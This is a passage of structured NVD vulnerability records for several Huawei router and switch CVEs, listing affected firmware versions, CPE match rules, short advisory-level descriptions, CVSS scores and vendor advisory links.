                     matchCriteriaId: "4907FBB8-5157-460D-9240-DD7D610C0FCC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCF23DAE-1215-41B2-88C5-4436D846266C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5973A534-F961-4A97-B20E-994BA28AFE29",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8FD118E1-317E-4903-A4D0-51EBCFA58C5B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "1AC26C2F-71A8-433A-B062-789F2E32605C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "A17ED5D3-1698-4AED-9640-F9CE026AD217",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 make it easier for remote authenticated administrators to obtain and decrypt passwords by leveraging selection of a reversible encryption algorithm.",
      },
      {
         lang: "es",
         value: "Routers Huawei AR con software en versiones anteriores a V200R007C00SPC100; routers Quidway S9300 con software en versiones anteriores a V200R009C00; routers S12700 con software en versiones anteriores aV200R008C00SPC500; routers S9300, Quidway S5300 y S5300 con software en versiones anteriores aV200R007C00 y routers S5700 con software en versiones anteriores aV200R007C00SPC500 facilita a administradores remotos autenticados obtener y descifrar contraseñas aprovechando la selección de un algoritmos de cifrado reversible.",
      },
   ],
   id: "CVE-2015-8085",
   lastModified: "2025-04-12T10:46:40.837",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "SINGLE",
               availabilityImpact: "NONE",
               baseScore: 4,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:S/C:P/I:N/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "NONE",
               baseScore: 4.9,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "HIGH",
               integrityImpact: "NONE",
               privilegesRequired: "HIGH",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
               version: "3.0",
            },
            exploitabilityScore: 1.2,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2016-10-03T21:59:03.800",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/76897",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/76897",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Deferred",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-326",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2016-10-03 21:59
Modified
2025-04-12 10:46
Summary
Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 makes it easier for remote authenticated administrators to obtain encryption keys and ciphertext passwords via vectors related to key storage.
Impacted products
Vendor Product Version
huawei quidway_s5300_firmware v200r001c00spc300
huawei quidway_s5300 -
huawei quidway_s9300_firmware v200r001c00spc300
huawei quidway_s9300_firmware v200r002c00spc100
huawei quidway_s9300_firmware v200r003c00spc500
huawei quidway_s9300 -
huawei s5700_firmware v200r001c00
huawei s5700_firmware v200r002c00
huawei s5700_firmware v200r003c00
huawei s5700_firmware v200r005c00
huawei s5700_firmware v200r006c00
huawei s5700 -
huawei s12700_firmware v200r005c00
huawei s12700_firmware v200r006c00
huawei s12700 -
huawei ar_firmware v200r001
huawei ar_firmware v200r002
huawei ar_firmware v200r003
huawei ar_firmware v200r005c10
huawei ar_firmware v200r005c20
huawei ar_firmware v200r005c30
huawei ar -
huawei s5300_firmware v200r002c00
huawei s5300_firmware v200r005c00spc500
huawei s5300_firmware v200r006c00spc500
huawei s5300 -
huawei s9300_firmware v200r005c00spc300
huawei s9300_firmware v200r006c00spc500
huawei s9300 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "B5B529C9-04F5-48C3-9346-C7E0104ED0C8",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:quidway_s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "4C872196-628D-42A2-AC58-69CD8784CE5D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "DB8B2442-4A0E-4C7A-8D21-A1E09BD1A204",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "3022A5BA-DD0D-47D8-8EFA-A617743C133A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "7B2FFB6E-1895-4796-B445-4A4193DEFEAE",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:quidway_s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2E756FE8-F106-4BFD-B33B-CC198363D2FD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "336AA440-AEF4-482B-A037-8976DC38BA1A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3B2DE9FE-5EC9-462E-86F0-EE772C944DFC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4907FBB8-5157-460D-9240-DD7D610C0FCC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCF23DAE-1215-41B2-88C5-4436D846266C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5973A534-F961-4A97-B20E-994BA28AFE29",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D81469B-EC6C-493D-B632-4DF821A1F304",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D6F2C4C7-3438-42B8-8999-C17E45C8CF49",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "138C1E57-176C-46B1-9704-D9C8391CC802",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "0A265FD5-0984-4698-97EB-2904C289561D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "EFF757E5-F689-49CF-9972-ED5A3D825891",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "08EAB0B6-9363-4632-814A-D51DD3087346",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r005c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "65081FFE-ECBD-42EE-885A-7E29AB844FBC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r005c20:*:*:*:*:*:*:*",
                     matchCriteriaId: "5356CB25-52E6-4786-B024-07F7B53E00A7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar_firmware:v200r005c30:*:*:*:*:*:*:*",
                     matchCriteriaId: "53A40184-F3A0-472C-B4DE-7AD6D73BEA17",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D1D2EB9C-FA8B-4B3F-89BE-AC2611EE4373",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8FD118E1-317E-4903-A4D0-51EBCFA58C5B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "1AC26C2F-71A8-433A-B062-789F2E32605C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "A17ED5D3-1698-4AED-9640-F9CE026AD217",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r005c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "A066F4B8-2258-4ED2-A166-02FCA7C9F3A7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDA38762-CACE-403B-8DE5-42E0306FEB28",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 makes it easier for remote authenticated administrators to obtain encryption keys and ciphertext passwords via vectors related to key storage.",
      },
      {
         lang: "es",
         value: "Routers Huawei AR con software en versiones anteriores a V200R007C00SPC100; routers Quidway S9300 con software en versiones anteriores a V200R009C00; routers S12700 con software en versiones anteriores a V200R008C00SPC500; routers S9300, Quidway S5300 y S5300 con software en versiones anteriores a V200R007C00 y routers S5700 con software en versiones anteriores a V200R007C00SPC500 facilita a administradores remotos autenticados obtener las claves de cifrado y contraseñas de texto cifrado a través de vectores relacionados con el almacenamiento de claves.",
      },
   ],
   id: "CVE-2015-8086",
   lastModified: "2025-04-12T10:46:40.837",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "SINGLE",
               availabilityImpact: "NONE",
               baseScore: 4,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:S/C:P/I:N/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "NONE",
               baseScore: 4.9,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "HIGH",
               integrityImpact: "NONE",
               privilegesRequired: "HIGH",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
               version: "3.0",
            },
            exploitabilityScore: 1.2,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2016-10-03T21:59:04.893",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/76897",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/76897",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Deferred",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-326",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2017-04-02 20:59
Modified
2024-11-21 02:07
Summary
Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches.
Impacted products
Vendor Product Version
huawei s9300_firmware v100r006c00spc500
huawei s9300_firmware v100r006c00spc800
huawei s9300 -
huawei s3300_firmware v100r006c00spc800
huawei s3300_firmware v100r006c01spc100
huawei s3300_firmware v100r006c03
huawei s3300 -
huawei s2300_firmware v100r006c00spc800
huawei s2300_firmware v100r006c01spc100
huawei s2300_firmware v100r006c03
huawei s2300 -
huawei s5300_firmware v100r006c00spc800
huawei s5300_firmware v100r006c01spc100
huawei s5300_firmware v100r006c03
huawei s5300 -
huawei s6300_firmware v100r006c00spc800
huawei s6300_firmware v100r006c01spc100
huawei s6300_firmware v100r006c03
huawei s6300 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v100r006c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "771FA881-8B73-4923-883E-6FB66DC5785B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                     matchCriteriaId: "FFDF8C50-BB1B-494F-A66C-6AA43829A1F8",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s3300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                     matchCriteriaId: "C32CA848-E4C4-4F45-B770-B0F56B1D803C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s3300_firmware:v100r006c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "01778409-3E0D-457D-A3A8-7D547B154EF0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s3300_firmware:v100r006c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "8C328054-3E5C-4122-AD5B-49A71791D7F6",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s3300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "1A1410A1-ADCC-474F-ABEE-F0FE48E4CD7A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                     matchCriteriaId: "D9B1ABFF-8054-47E2-A122-BBA45915EC4E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v100r006c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "6CBBAFAE-0988-4FB5-985F-D9F26F8FB590",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v100r006c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "FEFF6D05-BC82-4943-9D79-95CBEDD5CD2C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "17566603-275F-4E6B-B5D9-4A716EEC03DC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                     matchCriteriaId: "C23B78BC-958A-4F7B-AC41-8F92573CD050",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v100r006c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "7F131E90-5381-4CC4-B98C-F127A7C9B24E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v100r006c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "554D3674-06D0-4B04-9014-F4A5178785DF",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                     matchCriteriaId: "59483B72-F057-4274-8C88-FF908AB44F5A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v100r006c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "073D332C-3532-4F1E-9885-B5EBFAD04D9E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v100r006c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "3F133779-0AA7-468B-9470-075091872D5D",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches.",
      },
      {
         lang: "es",
         value: "Huawei S9300 con software en versiones anteriores a V100R006SPH013 y S2300,S3300,S5300,S6300 con software en versiones anteriores a V100R006SPH010 soporte Y.1731 y por lo tanto tener la vulnerabilidad Y.1731 en el procesamiento de paquetes especiales. Ta vulnerabilidad provoca el reinicio de los switches.",
      },
   ],
   id: "CVE-2014-3223",
   lastModified: "2024-11-21T02:07:42.830",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2017-04-02T20:59:00.237",
   references: [
      {
         source: "psirt@huawei.com",
         tags: [
            "Mitigation",
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-329625",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Mitigation",
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-329625",
      },
   ],
   sourceIdentifier: "psirt@huawei.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-19",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2018-01-08 19:29
Modified
2024-11-21 02:11
Summary
Multiple Huawei Campus switches allow remote attackers to enumerate usernames via vectors involving use of SSH by the maintenance terminal.
Impacted products
Vendor Product Version
huawei s9300_firmware v200r001c00spc300
huawei s9300_firmware v200r002c00spc300
huawei s9300_firmware v200r003c00spc500
huawei s9300 -
huawei s9300e_firmware v200r001c00spc300
huawei s9300e_firmware v200r002c00spc300
huawei s9300e_firmware v200r003c00spc500
huawei s9300e -
huawei s7700_firmware v200r001c00spc300
huawei s7700_firmware v200r002c00spc300
huawei s7700_firmware v200r003c00spc500
huawei s7700 -
huawei s9700_firmware v200r001c00spc300
huawei s9700_firmware v200r002c00spc300
huawei s9700_firmware v200r003c00spc500
huawei s9700 -
huawei s5700_firmware v200r001c00spc300
huawei s5700_firmware v200r002c00spc300
huawei s5700_firmware v200r003c00spc300
huawei s5700 -
huawei s6700_firmware v200r001c00spc300
huawei s6700_firmware v200r002c00spc300
huawei s6700_firmware v200r003c00spc300
huawei s6700 -
huawei s5300_firmware v200r001c00spc300
huawei s5300_firmware v200r002c00spc300
huawei s5300_firmware v200r003c00spc300
huawei s5300 -
huawei s6300_firmware v200r001c00spc300
huawei s6300_firmware v200r002c00spc300
huawei s6300_firmware v200r003c00spc300
huawei s6300 -
huawei s2300_firmware v100r006c05
huawei s2300 -
huawei s2700_firmware v100r006c05
huawei s2700 -
huawei s3300_firmware v100r006c05
huawei s3300 -
huawei s3700_firmware v100r006c05
huawei s3700 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "2D1EF10E-F18B-4F3A-AA2B-25003183E19D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "54D5B323-BFB3-4A0A-B1E1-37E4DC4FF984",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "78DA2DC7-63B3-40D7-BEC7-AF81066A2733",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "BB3FA8B2-A788-408C-AD24-AE5BA2501139",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "8F3D1698-CBF3-4C2C-B581-343FBD8E8831",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "E5752E4C-4B7D-4139-BCAE-7F52D4A235F4",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300e:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B913A258-48B6-45D0-A37B-2C665DCA735C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "07A44DEA-AB17-48F4-87C1-B3B6088BCD82",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD36DBAD-B0A9-4A16-AE6A-D3949A1764D6",
